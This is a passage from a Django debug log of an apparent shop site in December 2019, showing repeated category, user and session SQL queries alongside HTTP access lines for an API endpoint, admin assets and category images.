"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-12 07:40:59,933 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-12 07:40:59,937 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-12 07:40:59,941 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [12/Dec/2019 07:40:59] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-12 07:41:33,597 utils 11259 139831538779904 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-12T07:41:33.582038+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 12, 7, 41, 33, 582038, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-12 07:41:33,602 utils 11259 139831538779904 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-12 07:41:33,663 utils 11259 139831538779904 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-12 07:41:33,678 utils 11259 139831538779904 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-26T07:41:33.675784+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 26, 7, 41, 33, 675784, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [12/Dec/2019 07:41:33] "GET / HTTP/1.0" 200 8875 [12/Dec/2019 07:41:33] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 DEBUG 2019-12-12 07:41:34,001 utils 11259 139831538779904 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-12T07:41:33.985968+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 12, 7, 41, 33, 985968, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-12 07:41:34,005 utils 11259 139831538779904 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-12 07:41:34,058 utils 11259 139831538779904 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-12 07:41:34,071 utils 11259 139831538779904 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-26T07:41:34.069504+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 26, 7, 41, 34, 69504, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [12/Dec/2019 07:41:34] "GET / HTTP/1.0" 200 8875 [12/Dec/2019 07:41:34] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [12/Dec/2019 07:41:34] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [12/Dec/2019 07:41:34] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [12/Dec/2019 07:41:34] "GET /static/admin/img/icon-deletelink.svg HTTP/1.0" 200 392 [12/Dec/2019 07:41:34] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [12/Dec/2019 07:41:35] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [12/Dec/2019 07:41:35] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [12/Dec/2019 07:41:35] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [12/Dec/2019 07:41:35] "GET /favicon.ico HTTP/1.0" 404 6629 [12/Dec/2019 07:41:35] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [12/Dec/2019 07:45:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 07:45:39,249 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-12 07:45:39,255 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-12 07:45:39,257 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-12 07:45:39,259 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-12 07:45:39,262 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-12 07:45:39,264 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-12 07:45:39,267 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-12 07:45:39,270 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-12 07:45:39,274 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-12 07:45:39,278 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-12 07:45:39,283 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [12/Dec/2019 07:45:39] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [12/Dec/2019 07:45:40] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [12/Dec/2019 07:45:40] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [12/Dec/2019 07:45:40] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [12/Dec/2019 07:45:40] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [12/Dec/2019 07:45:40] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [12/Dec/2019 07:45:40] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [12/Dec/2019 07:45:41] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [12/Dec/2019 07:45:41] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [12/Dec/2019 07:45:42] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [12/Dec/2019 07:45:42] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 DEBUG 2019-12-12 07:45:46,374 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-12 07:45:46,382 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-12 07:45:46,387 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-12 07:45:46,391 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-12 07:45:46,395 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-12 07:45:46,399 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-12 07:45:46,403 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-12 07:45:46,406 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-12 07:45:46,411 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-12 07:45:46,414 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-12 07:45:46,418 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [12/Dec/2019 07:45:46] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-12 07:45:57,465 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-12 07:45:57,472 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-12 07:45:57,475 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-12 07:45:57,478 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-12 07:45:57,480 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-12 07:45:57,483 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-12 07:45:57,485 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-12 07:45:57,488 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-12 07:45:57,490 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-12 07:45:57,492 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-12 07:45:57,495 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [12/Dec/2019 07:45:57] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-12 07:46:00,105 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-12 07:46:00,113 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-12 07:46:00,117 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-12 07:46:00,121 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-12 07:46:00,125 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-12 07:46:00,129 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-12 07:46:00,133 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-12 07:46:00,137 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-12 07:46:00,141 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-12 07:46:00,145 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-12 07:46:00,150 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 